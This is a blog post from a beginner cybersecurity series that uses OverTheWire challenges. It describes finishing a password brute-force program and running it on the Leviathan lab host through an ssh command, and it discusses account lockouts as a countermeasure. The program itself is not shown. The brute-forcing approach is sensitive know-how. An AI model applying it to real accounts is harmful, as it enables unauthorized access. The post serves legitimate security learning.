Custom Attacks: a complete brute force program
Welcome back to the 21st iteration of this blog series. In this series, we’re growing our cybersecurity knowledge starting from the very basics using the overthewire.org challenges as a guide. First, I’d like to thank everyone for their feedback based on the last post! I’ll do my best to implement it and as always, more feedback is always welcome.
In this post, we’ll deploy our own custom program to crack passwords. We’ll apply this to the first password guess we had to find in the Leviathan challenge series.
We’ve finally made it to the point of completing our program! Take a look at my version of the program:
Our first password guessing hurdle was back in the bandit challenges and our simple loop to increment numbers did well. In Leviathan 1 -> 2, we originally obtained the password by debugging the program checking what it was compared against. We already know the password for that was “sex”. Let’s run our program to see if we can guess that password:
The “blanks” are ignored with how I wrote the program. Aside from that, the program works well!
Running it through to Leviathan can be done a couple of ways. The simplist is to copy our program to the machine and run it locally. The second, and better way, is to execute our script through ssh directly. Generally, we can log into a remote computer by: ssh user@address. We’ve often specified a port for the challenges, and then we’re prompted for the password. ssh is also capable of accepting commands to run and return the result of, without us having to do it manually after logging in. We can do this by putting our command in quotes at the end of our ssh command. In this case:
ssh firstname.lastname@example.org -p 2223 "python3" < hard_brute.py
The “python3” is a bash command telling leviathan1 to execute python3. The redirect is for our local file as well, which will then run on the remote computer. Once the process completes, it will return the result for us:
There’s a couple of things we have to keep in mind regarding the speed and useage. The first is that we have to give time for the “check” process to exit before we can execute it again to try a new password: hence the “taking a nap” and “sleep 1” lines of code. This unfortunately slows down our guessing to a crawl. The second is that although I’ve made my program interactive, it’s not very conducive to remote execution in this manner. Since the program collects information from the user as part of its execution, it doesn’t work well in this setting.
We can rewrite our code to accept command line arguments, much like how we’ve been using other commands in bash. The simpler and more immediate workaround, however, is to simply “hard code” our program and not allow interaction. ssh will periodically update us though with the progress:
Running our attack like this is awesome: the remote computer is the one doing all the hardwork, we’re just waiting for the result. It has a downside though of it being noticeable by security software.
While that’s working let’s explore another security principle: account lockouts. Account lockouts are one of the good countermeasures against bruteforcing. In fact, the delay in the process exiting in our current “attack” is a from of account lockout. If you’re familiar with mobile phone passcodes, attempting incorrect codes multiple times will prevent you from further attempts for a period of time. This period consistently increases with subsequent failed attempts.
Account lockouts can also prevent anymore attempts beyond a certain amount and require an administrator to unlock it. In the interest of time, I’ve gone ahead and set a start point for the our attack to be closer to the password (aax). Here’s our result:
Congratulations on completing your very own custom hacking tool! I’m sure you’ve had your share of complex challenges over the past couple of weeks. In fact, your current code may not have worked in practice even if it passed your testing. Mine needed some trimming before I could execute it over ssh. Embrace the challenges, the bugs, and the errors: they’re opportunities for you to expand your knowledge of how and why things work: the bread and butter of security.
To further hone your programming and hacking skills, improve on the current code and don’t be shy to take a look at how others have tackled this issue. It goes without saying that “With great power comes great responibility”. Use this knowledge wisely and legally.